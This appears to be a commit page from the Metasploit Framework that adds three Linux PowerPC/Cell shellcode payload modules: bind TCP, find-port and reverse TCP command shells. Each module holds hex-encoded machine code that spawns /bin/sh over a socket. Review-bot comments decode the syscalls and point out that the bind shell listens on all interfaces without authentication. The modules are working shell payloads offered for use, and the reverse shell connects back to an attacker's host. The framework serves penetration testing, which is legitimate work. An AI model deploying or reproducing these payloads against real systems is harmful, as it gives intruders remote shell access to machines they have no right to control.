Added Linux Power/Cell Broadband Engine Architecture payload modules …
…and advanced payload options git-svn-id: file:///home/svn/framework3/trunk@5899 4d416f70-5f16-0410-b530-b9f4589650da
Ramon de C Valle
committed
Nov 13, 2008
1 parent
73b02f1
commit dfbf6b3
Showing
7 changed files
with
601 additions
and
1 deletion.
@@ -0,0 +1,100 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/bind_tcp' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Bind TCP Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Listen for a connection and spawn a command shell', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::BindTcp, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'LPORT' => [ 58, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 # | ||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x7a\x1b\x78" +# mr r26,r3 # | ||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 # | ||
"\x3e\xe0\xff\x02" +# lis r23,-254 # | ||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) # | ||
"\x7c\x36\x0b\x78" +# mr r22,r1 # | ||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) # | ||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x75\x1b\x78" +# mr r21,r3 # | ||
"\x7f\x64\xdb\x78" +# mr r4,r27 # | ||
"\x7e\xa3\xab\x78" +# mr r3,r21 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
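Review bot: The per-instruction comments in the `'Payload'` string give only mnemonics, so the system call behind each `sc` has to be worked out by hand from the `r29 = 511` bias (`addi r0,r29,-409` is 102, socketcall; `addi r3,r29,-509` is sub-call 2, bind). A short comment ahead of each `sc` group would make the listing auditable, for example `# socketcall(SYS_BIND, args): sockaddr address is 0, i.e. all interfaces` before the second group, and likewise for listen, accept, dup2 (63) and execve (11). The same gap is in the find-port and reverse-TCP files of this commit. The `'Description'` could also state that the listener binds every interface and serves the shell to whichever client connects, with no authentication, since the code stores r31 (zero) as the address word.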
@@ -0,0 +1,87 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/find_port' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Find Port Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Spawn a shell on an established connection', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::FindPort, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'CPORT' => [ 86, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x7c\x3c\x0b\x78" +# mr r28,r1 # | ||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x3a\x0b\x78" +# mr r26,r1 # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x3b\xff\x01\xff" +# addi r31,r31,511 # | ||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 # | ||
"\x38\x21\x01\xff" +# addi r1,r1,511 # | ||
"\x38\x21\xfe\x05" +# addi r1,r1,-507 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 # | ||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) # | ||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 # | ||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> # | ||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 # | ||
"\x7f\x04\xc3\x78" +# mr r4,r24 # | ||
"\x7f\xe3\xfb\x78" +# mr r3,r31 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
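Review bot: The descriptor scan that starts at `fndsockcode+40` has no upper bound and never looks at the socketcall return value: r31 is incremented, getpeername is issued (`addi r3,r29,-504`, sub-call 7), and `bne+` loops back whenever the port halfword differs from CPORT. If no descriptor has a peer port equal to CPORT, the code spins indefinitely in the host process, which neither the `'Description'` nor any comment mentions. I would add a comment above the `'Payload'` string such as `# scans fds upward from 1 until getpeername() reports CPORT; does not terminate if none matches`. The hunk also leaves `'CPORT' => [ 86, 'n' ]` unexplained; it is the immediate of `cmplwi r25,1234`.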
@@ -0,0 +1,91 @@ | ||
## | ||
# $Id$ | ||
## | ||
|
||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/projects/Framework/ | ||
## | ||
|
||
|
||
require 'msf/core' | ||
require 'msf/core/handler/reverse_tcp' | ||
require 'msf/base/sessions/command_shell' | ||
|
||
|
||
module Metasploit3 | ||
|
||
include Msf::Payload::Single | ||
include Msf::Payload::Linux | ||
|
||
def initialize(info = {}) | ||
super(merge_info(info, | ||
'Name' => 'Linux Command Shell, Reverse TCP Inline', | ||
'Version' => '$Revision$', | ||
'Description' => 'Connect back to attacker and spawn a command shell', | ||
'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>', | ||
'License' => MSF_LICENSE, | ||
'Platform' => 'linux', | ||
'Arch' => [ ARCH_PPC, ARCH_CBEA ], | ||
'Handler' => Msf::Handler::ReverseTcp, | ||
'Session' => Msf::Sessions::CommandShell, | ||
'Payload' => | ||
{ | ||
'Offsets' => | ||
{ | ||
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ], | ||
'LPORT' => [ 62, 'n' ], | ||
}, | ||
'Payload' => | ||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 # | ||
"\x3b\xa0\x01\xff" +# li r29,511 # | ||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 # | ||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 # | ||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) # | ||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) # | ||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7c\x7a\x1b\x78" +# mr r26,r3 # | ||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 # | ||
"\x3e\xe0\x7f\x00" +# lis r23,32512 # | ||
"\x62\xf7\x00\x01" +# ori r23,r23,1 # | ||
"\x3a\xc0\x04\xd2" +# li r22,1234 # | ||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) # | ||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) # | ||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) # | ||
"\x7c\x35\x0b\x78" +# mr r21,r1 # | ||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) # | ||
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) # | ||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 # | ||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x7f\x64\xdb\x78" +# mr r4,r27 # | ||
"\x7f\x43\xd3\x78" +# mr r3,r26 # | ||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 # | ||
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> # | ||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # | ||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> # | ||
"\x7f\xc8\x02\xa6" +# mflr r30 # | ||
"\x3b\xde\x01\xff" +# addi r30,r30,511 # | ||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 # | ||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) # | ||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) # | ||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) # | ||
"\x7c\x24\x0b\x78" +# mr r4,r1 # | ||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 # | ||
"\x44\xff\xff\x02" +# sc # | ||
"/bin/sh" | ||
} | ||
)) | ||
end | ||
|
||
end |
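Review bot: The `'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ]` entry patches two separate 16-bit immediates, the `lis r23,32512` / `ori r23,r23,1` pair, and `'LPORT' => [ 62, 'n' ]` patches `li r22,1234`, but nothing in the file ties the numbers to those instructions. Any edit to the thirteen instructions before them would shift the offsets silently, so a comment next to `'Offsets'` should name the targets, e.g. `# LHOST: immediates of lis/ori r23 (bytes 54 and 58); LPORT: immediate of li r22 (byte 62)`. The `stw r27,-2(r1)` that follows also deserves a line: it is a word store at a 2-byte offset that overwrites the upper half of the port word with the family value 2 to form the sockaddr. The 127.0.0.1 and 1234 values in the listing are placeholders and could be labelled as such.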